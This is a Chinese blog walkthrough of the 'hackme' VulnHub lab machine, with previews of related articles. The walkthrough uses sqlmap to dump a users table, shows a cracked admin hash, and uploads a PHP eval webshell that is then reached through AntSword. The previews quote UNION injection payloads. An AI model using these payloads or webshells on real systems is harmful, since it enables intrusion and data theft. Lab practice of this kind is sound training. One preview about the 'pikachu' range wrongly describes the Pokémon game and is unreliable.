hackme靶场攻略

最新推荐文章于 2024-12-20 20:58:28 发布
最新推荐文章于 2024-12-20 20:58:28 发布
阅读量393 收藏 2
点赞数 8
分类专栏: hackme 文章标签: hackme
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_88387979/article/details/144617269
版权

前提:kali和hackme的连接方式都为net模式

将hackme.ova的镜像导入虚拟机中

出现此页面则表示导入成功,打开kali虚拟机终端,切换为root权限

arp-scan -l

遇到一个ip时首先使用御剑扫描后台,这里先保留,后面会用到

浏览器访问此ip

注册账户(admin,123456),登录

没有思路了,输入一个‘1’抓包试试

在‘1’后面加一个‘*’,鼠标右键选择复制到文件,保存到桌面

kali中使用sqlmap工具

sqlmap -r '/home/kali/桌面/1.txt'

发现存在sql注入

爆破库名

sqlmap -r '/home/kali/桌面/1.txt' --dbs

爆破表名

sqlmap -r '/home/kali/桌面/1.txt' -D webapphacking --tables

打印‘users’表

sqlmap -r '/home/kali/桌面/1.txt' -D webapphacking -T users --dump

发现有一个超级管理员用户,密码md5解密

2386acb2cf356944177746fc92523983

利用得到的账号密码再次登录

我们选择一个内容为一句话木马的php文件上传

<?php @eval($_POST[a]);?>

那么怎么查看上传后的文件呢?这时就需要之前御剑扫描到的那几个网址,分别访问试试

http://192.168.164.144/uploads/

就能发现上传后的1.php文件,双击打开,这个就是木马的路径

http://192.168.164.144/uploads/1.php

蚁剑连接

hackme靶场练习
SYJ_361的博客
03-18 2592
本文对hackme靶场进行练习,运用sql注入漏洞,以及msf木马反弹shell,进而取得root权限
oscp备考,oscp系列——hackme靶场:sql注入,文件上传,信息收集提权
最新发布
2202_75361164的博客
01-31 442
oscp备考,oscp系列——hackme靶场:sql注入,文件上传,信息收集提权难度简单偏下对于低权限shell获取涉及:sql注入,文件上传对于提权:信息收集。
hackme靶场(getshell)
weixin_65722679的博客
06-21 329
hackme靶场(getshell)
靶场-hackeme1
weixin_58602402的博客
06-12 273
1.在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件。Linux OS' order by 1# //正常。Linux OS' order by 4# //不正常。3.编写反弹shell的脚本,shell.py,并利用蚁剑上传并执行。Linux OS' order by 3# //正常。Linux OS' and 1=2 # //不正常。Linux OS' and 1=1 # //正常。7.爆破数据库名,用户名,版本号。
hackme靶场/靶机练习
weixin_69602647的博客
07-29 289
hackme靶场练习
hackme靶场教程
weixin_53198216的博客
07-29 240
1.扫描目录得到靶场地址,进行联合查询得到回显点,查询数据表名。11.打开蚁剑进入地址,看是否可以进行操作。9.抓包过程中,把jpg改为php后放行。5.根据列名得到用户名和密码。6.使用md5解密得到密码。8.上传一个图片马并进行抓包。10.查看木马上传是否成功。3.根据库名得到表名。4.根据表名得到列名。
Hackme1
追求卓越,技术流~
01-12 2271
文章目录前言一、搭建靶场环境二、实战2.1信息收集2.1.1网络扫描2.1.2查看靶机开放的端口22段口分析80端口分析2.2SQL注入2.2.1验证是否含有SQL注入漏洞2.2.2sqlmap注入攻击2.3文件上传漏洞2.4kali监听2.5权力提升总结 前言 学习网络安全技术,我认为:主要是在注重实战。 实践是检验真理的唯一标准 接下来主要围绕靶机的攻击进程来学习网络安全技术。 一、搭建靶场环境 攻击机kali: IP地址:192.168.247.129 靶机hackme1: IP地址:192.
Hackme靶机渗透
m0_50584370的博客
06-01 357
hackme靶机渗透
hackme靶机渗透~SQL注入+文件上传
weixin_67832625的博客
08-13 487
本文今天对hackerme这个靶机做了详细的介绍,主要是SQL注入和文件上传漏洞,难度适中,需要我们自习的对漏洞挖掘 ,最后提权的过程,有任何问题随时反馈作者
hackme靶场通关
weixin_56594114的博客
08-02 133
模式子网地址,靶机需要也设置成。显示结果,说明闭合方式是'去扫描全网段查看靶机的。
HACKME-1 打靶
weixin_57315671的博客
06-16 357
8.查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#9.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
HACKME:1靶机
JKding123的博客
10-22 1150
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
hackme2-dhcp靶场记录
lionwerson的博客
10-10 1347
1.下载靶场 下载地址 2.打开虚拟机,导入虚拟机后把网络模式由NAT改为桥接模式,启动。 先用浏览器访问一下80端口,是一个登录,没有验证码,可以试一下爆破。我这里还是先注册一下,不行再爆破。 可以注册,注册登录之后发现这是一个图书系统。 搜索一下试试,显示了所有的图书。 但凡有搜索的地方,先试一下sql注入,抓包看一下,post有search参数,手工测试一下。 search存注入,字符型。联合注入一下,试一下字段数。 没有注入成功,盲...
hackme漏洞打靶
C233333235的博客
07-29 465
order by 3时页面显示正常,4时页面显示错误,所以这里存在sql注入漏洞,因为他是post提交,url中没有参数,于是我们抓包到sqlmap中运行,这里要在参数(这里是1)后面加一个*,提醒sqlmap这是参数,我们将请求包复制粘贴到sqlmap根目录下的一个叫html.txt的文件中。然后我们就要去找这个靶机的IP地址,首先将该虚拟机网卡设置为net模式,然后在物理机中查看自己ip,看看vmnet8的地址c段是什么,我这里是209,然后用工具去扫描该c段下哪个ip开放了80端口。
hackme靶场与Tomato靶场渗透测试实战
m0_59768231的博客
12-20 570
1、主机发现2.登录主页发现登录页面,而且还可以注册用户3. 点击 Sign up now 注册用户admin 密码1234564. 登录admin用户 单击search可以进行查看到很多的书名5. 验证sql注入 Windows OS' and 1=1#得到如图:验证出此处存在字符型(单引号)sql注入7. 判断字段数 Windows OS' order by 3#判断出来字段数是3个9.判断显示位置10. 查看当前数据库位置。
适合新手入门的靶场 TryHackMe(非常详细),零基础入门到精通,看这一篇就够了
weixin_51725318的博客
10-21 7454
适合新手入门的靶场 TryHackMe(非常详细),零基础入门到精通,看这一篇就够了
hackme 靶场复现
m0_68471358的博客
08-02 398
靶机下载地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/将靶机下载并导入到VMware虚拟机当中,开启hackme1靶场,并开启kali当作攻击机将两台虚拟机均设为桥接模式二.靶机渗透。
pikachu靶场攻略
06-13
Pikachu靶场是一款基于《宝可梦》(Pokemon)系列的游戏挑战,玩家通常在游戏内扮演皮卡丘进行各种训练和战斗。攻略这类游戏通常包括以下几个方面: 1. **熟悉规则**:了解游戏的基本操作,比如如何移动、攻击、使用技能、捕捉宝可梦等。 2. **训练皮卡丘**:提升皮卡丘的能力,通过战斗获得经验值和等级,强化它的属性,特别是速度和电属性,因为皮卡丘作为雷电属性的精灵,这些会增加它的战斗力。 3. **技能选择**:给皮卡丘学习适合的招式,比如Quick Attack(快速攻击)和Thunderbolt(雷电攻击)等,这有助于在对战中快速应对不同类型的对手。 4. **战术运用**:在对战中灵活运用策略,比如先发制人或者防守反击,根据对手的属性弱点选择合适的攻击。 5. **宝可梦收集**:除了皮卡丘,收集其他有用的宝可梦来组成队伍,多样性可以使战术更加丰富。 6. **参与活动**:游戏中可能有季节性或特殊活动,参与这些能获取额外的奖励,增强团队实力。 7. **练习对战**:不断与其他玩家或AI进行对战,提高实战经验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值